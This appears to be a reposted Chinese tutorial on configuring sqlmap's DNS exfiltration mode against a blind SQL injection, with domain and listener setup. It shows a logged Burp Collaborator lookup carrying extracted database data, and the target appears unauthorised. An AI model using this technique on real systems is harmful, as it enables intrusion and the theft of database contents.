sqlmap _dns注入配置方法是什麼

網路上針對sqlmap進行dns注入的相關文章太少，只是簡單介紹了下--dns-domain參數，相關的實戰文章要么就寫的模糊或者一筆帶過，搞的雲裡霧裡（主要是菜，關鍵還沒大佬帶）。然後自己參考網路上的方法自己重新搞了一遍。

需要準備的東西，sqlmap、windows盲註一個、兩個網域、一台外網伺服器。

某次搞事情的時候碰到一個時間盲注，剛好是台windows的，想起dns注入的方法。

在開始前我準備先用sqlmap的--sql-shell 指令進行dns注入payload的測試

先到burpsuite中的collaborator client中複製出burp給我們安排的網域

在利用sqlmap執行sql語句

##Sqlmap還在跑的過程中burpsuite中已經接收到請求了。

352E362E3134.9hreqpopru1xgf9skq473yo14sajy8.burpcollaborator.net.

中的352E362E3134就是執行version()後返回的結果。

解碼取得到mysql的版本。好了至此這個點進行dns注入是沒毛病的。

準備配置網域2個，網路上有些文章說一個也行，但是總感覺較為麻煩，很多網域伺服器商也並未提供某些進階功能，所以還是準備兩個的簡單些。

www.a.com  

www.b.com

#首先我們來設定網域a-> a.com

只需要新增*進行泛解析指向我們的外網伺服器的ip就可以了。

在來設定我們的網域b->b.com

這就更簡單了，直接修改網域的dns，就填入ns1 .a.com ns2.a.com 就行了其他的都不用搞，照著填寫就行了。

然後等待網域生效。我們在到外網伺服器上來測試下看是否解析成功

伺服器上開始監聽53埠

然後本機ping hello.b.com 在外網伺服器上發我們已經能接受到hello.b.com的請求，而本機提示是找不到主機不用管，因為我們沒有設定解析。已經都配置完畢我們使用sqlmap進行dns注入即可。

Sqlmap中加入參數--dns-domain=b.com --hex即可

來到這一步sqlmap會卡住提示設定DNS伺服器實例

直接ctrl c

#提示透過DNS通道的資料檢索成功。

注入的速度就跟報錯和聯合一樣快了，再也不用忍受龜速了。

以上是sqlmap _dns注入配置方法是什麼的詳細內容。更多資訊請關注PHP中文網其他相關文章！